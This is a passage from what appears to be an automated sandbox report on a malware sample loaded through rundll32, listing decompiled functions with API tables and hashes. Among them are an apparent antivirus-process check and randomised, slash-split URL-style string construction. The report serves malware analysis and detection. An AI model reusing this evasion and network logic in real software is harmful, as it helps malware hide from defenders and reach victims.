					_t31 = E04F4205E(_t32, _t26);
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t28 != 0 && _t31 != 0) {
						 *_t28 =  *_t28 & 0xfffffffe;
					}
					goto L20;
				} else {
					_t19 =  *0x4f4d0f0( *_t32, 0x20);
					if(_t19 != 0) {
						 *_t19 = 0;
						_t19 = _t19 + 2;
					}
					_t31 = E04F4A501(0,  *_t32, _t19, 0);
					if(_t31 == 0) {
						if(_t25 == 0) {
							L22:
							return _t31;
						}
						_t31 = WaitForSingleObject(_t25, 0x4e20);
						if(_t31 == 0) {
							L20:
							if(_t25 != 0) {
								CloseHandle(_t25);
							}
							goto L22;
						}
					}
					goto L12;
				}
			}















                                                  0x04f442eb
                                                  0x04f442f2
                                                  0x04f442fc
                                                  0x04f44300
                                                  0x04f44306
                                                  0x04f44315
                                                  0x04f4431c
                                                  0x04f44320
                                                  0x04f44332
                                                  0x04f44334
                                                  0x04f44334
                                                  0x04f44339
                                                  0x04f44340
                                                  0x04f44395
                                                  0x04f44395
                                                  0x04f4439b
                                                  0x04f4439d
                                                  0x04f4439d
                                                  0x04f443a7
                                                  0x04f443ab
                                                  0x04f443bd
                                                  0x04f443bd
                                                  0x04f443c1
                                                  0x04f443c7
                                                  0x04f443c7
                                                  0x00000000
                                                  0x04f44359
                                                  0x04f4435e
                                                  0x04f44366
                                                  0x04f44368
                                                  0x04f4436c
                                                  0x04f4436c
                                                  0x04f44379
                                                  0x04f4437d
                                                  0x04f44381
                                                  0x04f443d6
                                                  0x04f443dc
                                                  0x04f443dc
                                                  0x04f4438f
                                                  0x04f44393
                                                  0x04f443ca
                                                  0x04f443cc
                                                  0x04f443cf
                                                  0x04f443cf
                                                  0x00000000
                                                  0x04f443cc
                                                  0x04f44393
                                                  0x00000000
                                                  0x04f4437d

                                                  APIs
                                                    • Part of subcall function 04F47A9A: lstrlen.KERNEL32(04F423E9,00000000,00000000,00000027,00000005,00000000,00000000,04F496DA,74666F53,00000000,04F423E9,04F4D00C,?,04F423E9), ref: 04F47AD0
                                                    • Part of subcall function 04F47A9A: lstrcpy.KERNEL32(00000000,00000000), ref: 04F47AF4
                                                    • Part of subcall function 04F47A9A: lstrcat.KERNEL32(00000000,00000000), ref: 04F47AFC
                                                  • CreateEventA.KERNEL32(04F4D2A8,00000001,00000000,00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,04F43CA0,?,00000001,?), ref: 04F4432B
                                                    • Part of subcall function 04F49039: HeapFree.KERNEL32(00000000,00000000,04F47F18,00000000,?,?,00000000), ref: 04F49045
                                                  • WaitForSingleObject.KERNEL32(00000000,00004E20,04F43CA0,00000000,00000000,?,00000000,?,04F43CA0,?,00000001,?,?,?,?,04F46880), ref: 04F44389
                                                  • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,00000001,?,00000000,?,04F43CA0,?,00000001,?), ref: 04F443B7
                                                  • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,04F43CA0,?,00000001,?,?,?,?,04F46880), ref: 04F443CF
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.348222090.0000000004F41000.00000020.00020000.sdmp, Offset: 04F40000, based on PE: true
                                                  • Associated: 00000011.00000002.348194349.0000000004F40000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348239029.0000000004F4C000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348247296.0000000004F4D000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348265999.0000000004F4F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_4f40000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                                                  • String ID:
                                                  • API String ID: 73268831-0
                                                  • Opcode ID: 2ed7969dcea189fb6c34b38679274b6cffe832b3517dcf4e9ebce4721ed23326
                                                  • Instruction ID: 1a661693f4a42194b173501c5c75c967f92941dd76ad15b66241fb744911f67d
                                                  • Opcode Fuzzy Hash: 2ed7969dcea189fb6c34b38679274b6cffe832b3517dcf4e9ebce4721ed23326
                                                  • Instruction Fuzzy Hash: A721E472A012559BE731AEA8AC44B7B7FE9EBC8F10F050615F955FB140DF61EC039690
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04F4A0B2, Relevance: 6.1, APIs: 4, Instructions: 92synchronizationCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 38%
                                                  			E04F4A0B2(void* __ecx, void* __esi) {
				char _v8;
				long _v12;
				char _v16;
				long _v20;
				long _t34;
				long _t39;
				long _t42;
				long _t56;
				intOrPtr _t58;
				void* _t59;
				intOrPtr* _t60;
				void* _t61;

				_t61 = __esi;
				_t59 = __ecx;
				_t60 =  *0x4f4d144; // 0x4f4ad81
				 *((intOrPtr*)(__esi + 0x2c)) = 0;
				do {
					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
					_v20 = _t34;
					if(_t34 != 0) {
						L3:
						_push( &_v16);
						_push( &_v8);
						_push(_t61 + 0x2c);
						_push(0x20000013);
						_push( *((intOrPtr*)(_t61 + 0x18)));
						_v8 = 4;
						_v16 = 0;
						if( *_t60() == 0) {
							_t39 = GetLastError();
							_v12 = _t39;
							if(_v20 == 0 || _t39 != 0x2ef3) {
								L15:
								return _v12;
							} else {
								goto L11;
							}
						}
						if(_v8 != 4 ||  *((intOrPtr*)(_t61 + 0x2c)) == 0) {
							goto L11;
						} else {
							_v16 = 0;
							_v8 = 0;
							 *_t60( *((intOrPtr*)(_t61 + 0x18)), 0x16, 0,  &_v8,  &_v16);
							_t58 = E04F42049(_v8 + 1);
							if(_t58 == 0) {
								_v12 = 8;
							} else {
								_push( &_v16);
								_push( &_v8);
								_push(_t58);
								_push(0x16);
								_push( *((intOrPtr*)(_t61 + 0x18)));
								if( *_t60() == 0) {
									E04F49039(_t58);
									_v12 = GetLastError();
								} else {
									 *((char*)(_t58 + _v8)) = 0;
									 *((intOrPtr*)(_t61 + 0xc)) = _t58;
								}
							}
							goto L15;
						}
					}
					SetEvent( *(_t61 + 0x1c));
					_t56 =  *((intOrPtr*)(_t61 + 0x28));
					_v12 = _t56;
					if(_t56 != 0) {
						goto L15;
					}
					goto L3;
					L11:
					_t42 = E04F41C47( *(_t61 + 0x1c), _t59, 0xea60);
					_v12 = _t42;
				} while (_t42 == 0);
				goto L15;
			}















                                                  0x04f4a0b2
                                                  0x04f4a0b2
                                                  0x04f4a0bc
                                                  0x04f4a0c2
                                                  0x04f4a0c5
                                                  0x04f4a0c9
                                                  0x04f4a0d1
                                                  0x04f4a0d4
                                                  0x04f4a0ed
                                                  0x04f4a0f0
                                                  0x04f4a0f4
                                                  0x04f4a0f8
                                                  0x04f4a0f9
                                                  0x04f4a0fe
                                                  0x04f4a101
                                                  0x04f4a108
                                                  0x04f4a10f
                                                  0x04f4a162
                                                  0x04f4a16b
                                                  0x04f4a16e
                                                  0x04f4a1a9
                                                  0x04f4a1af
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x04f4a16e
                                                  0x04f4a115
                                                  0x00000000
                                                  0x04f4a11c
                                                  0x04f4a12a
                                                  0x04f4a12d
                                                  0x04f4a130
                                                  0x04f4a13c
                                                  0x04f4a140
                                                  0x04f4a1a2
                                                  0x04f4a142
                                                  0x04f4a145
                                                  0x04f4a149
                                                  0x04f4a14a
                                                  0x04f4a14b
                                                  0x04f4a14d
                                                  0x04f4a154
                                                  0x04f4a192
                                                  0x04f4a19d
                                                  0x04f4a156
                                                  0x04f4a159
                                                  0x04f4a15d
                                                  0x04f4a15d
                                                  0x04f4a154
                                                  0x00000000
                                                  0x04f4a140
                                                  0x04f4a115
                                                  0x04f4a0d9
                                                  0x04f4a0df
                                                  0x04f4a0e4
                                                  0x04f4a0e7
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x04f4a177
                                                  0x04f4a17f
                                                  0x04f4a186
                                                  0x04f4a186
                                                  0x00000000

                                                  APIs
                                                  • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,751881D0), ref: 04F4A0C9
                                                  • SetEvent.KERNEL32(?), ref: 04F4A0D9
                                                  • GetLastError.KERNEL32 ref: 04F4A162
                                                    • Part of subcall function 04F41C47: WaitForMultipleObjects.KERNEL32(00000002,04F4AA72,00000000,04F4AA72,?,?,?,04F4AA72,0000EA60), ref: 04F41C62
                                                    • Part of subcall function 04F49039: HeapFree.KERNEL32(00000000,00000000,04F47F18,00000000,?,?,00000000), ref: 04F49045
                                                  • GetLastError.KERNEL32(00000000), ref: 04F4A197
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.348222090.0000000004F41000.00000020.00020000.sdmp, Offset: 04F40000, based on PE: true
                                                  • Associated: 00000011.00000002.348194349.0000000004F40000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348239029.0000000004F4C000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348247296.0000000004F4D000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348265999.0000000004F4F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_4f40000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
                                                  • String ID:
                                                  • API String ID: 602384898-0
                                                  • Opcode ID: 2eea41d9fa3deba216a3be1a395133157018a61a9b08b53659821a5d07f44f1f
                                                  • Instruction ID: 467ace4b8319e01d53d0020857ef4d0598c5b4b57c6a580fc746c4fe5a20d7db
                                                  • Opcode Fuzzy Hash: 2eea41d9fa3deba216a3be1a395133157018a61a9b08b53659821a5d07f44f1f
                                                  • Instruction Fuzzy Hash: B9312EB5D40308EFEB20DFE5DC8099EBBB8EF84344F10496AE502E2150DB70AA86DF10
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04F43BF1, Relevance: 6.1, APIs: 4, Instructions: 87sleepCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 40%
                                                  			E04F43BF1(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t38 = E04F49763(__ecx,  &_v32);
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t16 =  &(_t39[1]); // 0x5
						_t23 = _t16;
						if( *_t16 != 0) {
							E04F4A022(_t23);
						}
					}
					return _t38;
				}
				if(E04F4A72D(0x40,  &_v16) != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0x4f4d2a8, 1, 0,  *0x4f4d344);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8);
					CloseHandle(_t40);
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E04F48A51(_t36);
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E04F417D5(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E04F41F99(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E04F442EA( &_v32, _t39);
					goto L13;
				}
			}












                                                  0x04f43bf1
                                                  0x04f43bfe
                                                  0x04f43c04
                                                  0x04f43c05
                                                  0x04f43c06
                                                  0x04f43c07
                                                  0x04f43c08
                                                  0x04f43c0c
                                                  0x04f43c18
                                                  0x04f43c1c
                                                  0x04f43ca4
                                                  0x04f43ca4
                                                  0x04f43ca7
                                                  0x04f43ca9
                                                  0x04f43cb1
                                                  0x04f43cb1
                                                  0x04f43cb7
                                                  0x04f43cba
                                                  0x04f43cba
                                                  0x04f43cb7
                                                  0x04f43cc5
                                                  0x04f43cc5
                                                  0x04f43c2f
                                                  0x04f43c31
                                                  0x04f43c31
                                                  0x04f43c48
                                                  0x04f43c4c
                                                  0x04f43c4f
                                                  0x04f43c5a
                                                  0x04f43c61
                                                  0x04f43c61
                                                  0x04f43c6d
                                                  0x04f43c6e
                                                  0x04f43c7c
                                                  0x04f43c70
                                                  0x04f43c70
                                                  0x04f43c71
                                                  0x04f43c72
                                                  0x04f43c73
                                                  0x04f43c74
                                                  0x04f43c75
                                                  0x04f43c75
                                                  0x04f43c81
                                                  0x04f43c86
                                                  0x04f43c88
                                                  0x04f43c8a
                                                  0x04f43c8a
                                                  0x04f43c91
                                                  0x00000000
                                                  0x04f43c93
                                                  0x04f43c93
                                                  0x04f43ca0
                                                  0x00000000
                                                  0x04f43ca0

                                                  APIs
                                                  • CreateEventA.KERNEL32(04F4D2A8,00000001,00000000,00000040,00000001,?,7519F710,00000000,7519F730,?,?,?,04F46880,?,00000001,?), ref: 04F43C42
                                                  • SetEvent.KERNEL32(00000000,?,?,?,04F46880,?,00000001,?,00000002,?,?,04F42417,?), ref: 04F43C4F
                                                  • Sleep.KERNEL32(00000BB8,?,?,?,04F46880,?,00000001,?,00000002,?,?,04F42417,?), ref: 04F43C5A
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,04F46880,?,00000001,?,00000002,?,?,04F42417,?), ref: 04F43C61
                                                    • Part of subcall function 04F48A51: WaitForSingleObject.KERNEL32(00000000,?,?,?,04F43C81,?,04F43C81,?,?,?,?,?,04F43C81,?), ref: 04F48B2B
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.348222090.0000000004F41000.00000020.00020000.sdmp, Offset: 04F40000, based on PE: true
                                                  • Associated: 00000011.00000002.348194349.0000000004F40000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348239029.0000000004F4C000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348247296.0000000004F4D000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348265999.0000000004F4F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_4f40000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: Event$CloseCreateHandleObjectSingleSleepWait
                                                  • String ID:
                                                  • API String ID: 2559942907-0
                                                  • Opcode ID: 19dc27669e5520a405c5ca3ecf51e0a11c30f470fc682fe368780c6962ef95ab
                                                  • Instruction ID: 7d4e646e4b6813372452ad1f936046061d35d398989eb0c0c2482477044b05bb
                                                  • Opcode Fuzzy Hash: 19dc27669e5520a405c5ca3ecf51e0a11c30f470fc682fe368780c6962ef95ab
                                                  • Instruction Fuzzy Hash: 8B217476E00219ABDB10BFE898849AEBBA9EBC4354B014425EA11E7100DF74FD578BA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04F41A70, Relevance: 6.1, APIs: 4, Instructions: 76sleepstringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 78%
                                                  			E04F41A70(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0;
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E04F42049(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16);
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}














                                                  0x04f41a7c
                                                  0x04f41a80
                                                  0x04f41a81
                                                  0x04f41a82
                                                  0x04f41a84
                                                  0x04f41a86
                                                  0x04f41a8b
                                                  0x04f41a8e
                                                  0x04f41b25
                                                  0x04f41b2c
                                                  0x04f41b2c
                                                  0x04f41a97
                                                  0x04f41a9e
                                                  0x04f41aae
                                                  0x04f41aae
                                                  0x04f41ab4
                                                  0x04f41ab6
                                                  0x04f41abb
                                                  0x04f41ac4
                                                  0x04f41acc
                                                  0x04f41acf
                                                  0x04f41ada
                                                  0x04f41ade
                                                  0x04f41ae0
                                                  0x04f41ae1
                                                  0x04f41aea
                                                  0x04f41aee
                                                  0x04f41aff
                                                  0x04f41af0
                                                  0x04f41af5
                                                  0x04f41afa
                                                  0x04f41b09
                                                  0x04f41b09
                                                  0x04f41ade
                                                  0x04f41b0f
                                                  0x04f41b15
                                                  0x04f41b15
                                                  0x04f41b1e
                                                  0x04f41b23
                                                  0x04f41b23
                                                  0x00000000

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.348222090.0000000004F41000.00000020.00020000.sdmp, Offset: 04F40000, based on PE: true
                                                  • Associated: 00000011.00000002.348194349.0000000004F40000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348239029.0000000004F4C000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348247296.0000000004F4D000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348265999.0000000004F4F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_4f40000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: FreeSleepStringlstrlenmemcpy
                                                  • String ID:
                                                  • API String ID: 1198164300-0
                                                  • Opcode ID: e4d9faa3807831347e13df920047403d40d22439ec4cc7fd9321ad28d0487619
                                                  • Instruction ID: 773cab331f535b1e4c0ac203cc88852945437a2079389e1c3afde48f5e6367ec
                                                  • Opcode Fuzzy Hash: e4d9faa3807831347e13df920047403d40d22439ec4cc7fd9321ad28d0487619
                                                  • Instruction Fuzzy Hash: 7B217475A01209EFDB10DFA8D9889DEBFB5FF89305B148169E905E7210EB34EA45CB50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04F4788B, Relevance: 6.1, APIs: 4, Instructions: 61memorystringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 68%
                                                  			E04F4788B(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0x4f4d238, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0x4f4d250; // 0x0
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0x4f4d250 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

















                                                  0x04f47893
                                                  0x04f47896
                                                  0x04f4789c
                                                  0x04f478b4
                                                  0x04f478b8
                                                  0x04f478bb
                                                  0x04f478bd
                                                  0x04f478c0
                                                  0x04f478c2
                                                  0x04f478c5
                                                  0x04f478c7
                                                  0x04f478c7
                                                  0x04f478c9
                                                  0x04f478d4
                                                  0x04f478d9
                                                  0x04f478ea
                                                  0x04f478f2
                                                  0x04f478f7
                                                  0x04f478fa
                                                  0x04f478fd
                                                  0x04f478ff
                                                  0x04f47905
                                                  0x04f47908
                                                  0x04f47908
                                                  0x04f47908
                                                  0x04f47913
                                                  0x04f47918
                                                  0x04f47922

                                                  APIs
                                                  • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,04F4839A,00000000,?,?,04F4A428,?,070795B0), ref: 04F47896
                                                  • RtlAllocateHeap.NTDLL(00000000,?), ref: 04F478AE
                                                  • memcpy.NTDLL(00000000,?,-00000008,?,?,?,04F4839A,00000000,?,?,04F4A428,?,070795B0), ref: 04F478F2
                                                  • memcpy.NTDLL(00000001,?,00000001), ref: 04F47913
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.348222090.0000000004F41000.00000020.00020000.sdmp, Offset: 04F40000, based on PE: true
                                                  • Associated: 00000011.00000002.348194349.0000000004F40000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348239029.0000000004F4C000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348247296.0000000004F4D000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348265999.0000000004F4F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_4f40000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: memcpy$AllocateHeaplstrlen
                                                  • String ID:
                                                  • API String ID: 1819133394-0
                                                  • Opcode ID: f0ea7d507fc276b32197ce6072fd9544a6342e1113f125e6333ce9f9bc9ccb3b
                                                  • Instruction ID: 4ee4d1f6e5b24f1b338006636db1dd8f2ea837e63a92ebad9e9f094c873a7d71
                                                  • Opcode Fuzzy Hash: f0ea7d507fc276b32197ce6072fd9544a6342e1113f125e6333ce9f9bc9ccb3b
                                                  • Instruction Fuzzy Hash: C711C676A00118AFE7109E69EC84E9EBFEAEBD5260B150166F505DB140EF74AE05C7A0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04F47A9A, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 48stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 53%
                                                  			E04F47A9A(intOrPtr _a4, intOrPtr _a8) {
				char _v20;
				void* _t8;
				void* _t13;
				void* _t16;
				char* _t18;
				void* _t19;

				_t19 = 0x27;
				_t1 =  &_v20; // 0x74666f53
				_t18 = 0;
				E04F46B43(_t8, _t1);
				_t16 = E04F42049(_t19);
				if(_t16 != 0) {
					_t3 =  &_v20; // 0x74666f53
					_t13 = E04F486D8(_t3, _t16, _a8);
					if(_a4 != 0) {
						__imp__(_a4);
						_t19 = _t13 + 0x27;
					}
					_t18 = E04F42049(_t19);
					if(_t18 != 0) {
						 *_t18 = 0;
						if(_a4 != 0) {
							__imp__(_t18, _a4);
						}
						__imp__(_t18, _t16);
					}
					E04F49039(_t16);
				}
				return _t18;
			}









                                                  0x04f47aa5
                                                  0x04f47aa6
                                                  0x04f47aa9
                                                  0x04f47aab
                                                  0x04f47ab6
                                                  0x04f47aba
                                                  0x04f47abf
                                                  0x04f47ac3
                                                  0x04f47acb
                                                  0x04f47ad0
                                                  0x04f47ad8
                                                  0x04f47ad8
                                                  0x04f47ae1
                                                  0x04f47ae5
                                                  0x04f47aeb
                                                  0x04f47aee
                                                  0x04f47af4
                                                  0x04f47af4
                                                  0x04f47afc
                                                  0x04f47afc
                                                  0x04f47b03
                                                  0x04f47b03
                                                  0x04f47b0e

                                                  APIs
                                                    • Part of subcall function 04F42049: RtlAllocateHeap.NTDLL(00000000,00000000,04F47E50), ref: 04F42055
                                                    • Part of subcall function 04F486D8: wsprintfA.USER32 ref: 04F48734
                                                  • lstrlen.KERNEL32(04F423E9,00000000,00000000,00000027,00000005,00000000,00000000,04F496DA,74666F53,00000000,04F423E9,04F4D00C,?,04F423E9), ref: 04F47AD0
                                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 04F47AF4
                                                  • lstrcat.KERNEL32(00000000,00000000), ref: 04F47AFC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.348222090.0000000004F41000.00000020.00020000.sdmp, Offset: 04F40000, based on PE: true
                                                  • Associated: 00000011.00000002.348194349.0000000004F40000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348239029.0000000004F4C000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348247296.0000000004F4D000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348265999.0000000004F4F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_4f40000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: AllocateHeaplstrcatlstrcpylstrlenwsprintf
                                                  • String ID: Soft
                                                  • API String ID: 393707159-3753413193
                                                  • Opcode ID: 42a64adee12229c25108d32e2dae14eb262516dc7fb7c05ef7a7bd8da5421963
                                                  • Instruction ID: 30004284156914d9751af847808206befd9ae4008f0ccd7361754cd0d7a6a8cc
                                                  • Opcode Fuzzy Hash: 42a64adee12229c25108d32e2dae14eb262516dc7fb7c05ef7a7bd8da5421963
                                                  • Instruction Fuzzy Hash: 5601F236100249A7D712BAA9AC84EEF3FA8EFC0289F054021F50595100EF79AA47C7A1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04F4757F, Relevance: 6.0, APIs: 4, Instructions: 41processCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 68%
                                                  			E04F4757F() {
				char _v264;
				void* _v300;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t17 = CreateToolhelp32Snapshot(2, 0);
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300);
					while(_t8 != 0) {
						_t9 =  *0x4f4d27c; // 0x212a5a8
						_t2 = _t9 + 0x4f4ee54; // 0x73617661
						_push( &_v264);
						if( *0x4f4d0fc() != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						CloseHandle(_t17);
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}









                                                  0x04f4758a
                                                  0x04f47594
                                                  0x04f47598
                                                  0x04f475a2
                                                  0x04f475d3
                                                  0x04f475a9
                                                  0x04f475ae
                                                  0x04f475bb
                                                  0x04f475c4
                                                  0x04f475db
                                                  0x04f475c6
                                                  0x04f475ce
                                                  0x00000000
                                                  0x04f475ce
                                                  0x04f475dc
                                                  0x04f475dd
                                                  0x00000000
                                                  0x04f475dd
                                                  0x00000000
                                                  0x04f475d7
                                                  0x04f475e3
                                                  0x04f475e8

                                                  APIs
                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 04F4758F
                                                  • Process32First.KERNEL32(00000000,?), ref: 04F475A2
                                                  • Process32Next.KERNEL32(00000000,?), ref: 04F475CE
                                                  • CloseHandle.KERNEL32(00000000), ref: 04F475DD
                                                  Memory Dump Source
                                                  • Source File: 00000011.00000002.348222090.0000000004F41000.00000020.00020000.sdmp, Offset: 04F40000, based on PE: true
                                                  • Associated: 00000011.00000002.348194349.0000000004F40000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348239029.0000000004F4C000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348247296.0000000004F4D000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000011.00000002.348265999.0000000004F4F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_17_2_4f40000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                  • String ID:
                                                  • API String ID: 420147892-0
                                                  • Opcode ID: 2aef96ceb2aa6c3f66ba3ae308818efde2ac690cb00b6f7bc6c9ce6125616dc4
                                                  • Instruction ID: 2814361fefc9cba75d1f7b8cdc748bd1a28861e30b1f32faeb8aa835bd203684
                                                  • Opcode Fuzzy Hash: 2aef96ceb2aa6c3f66ba3ae308818efde2ac690cb00b6f7bc6c9ce6125616dc4
                                                  • Instruction Fuzzy Hash: 5DF090766051296AEB20B6769C48EEB3BECDBC5614F004061F906D7000FF68EE4B8AA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04F47C61, Relevance: 6.0, APIs: 4, Instructions: 40COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E04F47C61(void* __esi) {
				struct _SECURITY_ATTRIBUTES* _v4;
				void* _t8;
				void* _t10;

				_v4 = 0;
				memset(__esi, 0, 0x38);
				_t8 = CreateEventA(0, 1, 0, 0);
				 *(__esi + 0x1c) = _t8;
				if(_t8 != 0) {
					_t10 = CreateEventA(0, 1, 1, 0);
					 *(__esi + 0x20) = _t10;
					if(_t10 == 0) {
						CloseHandle( *(__esi + 0x1c));
					} else {
						_v4 = 1;
					}
				}
				return _v4;
			}






                                                  0x04f47c6b
                                                  0x04f47c6f
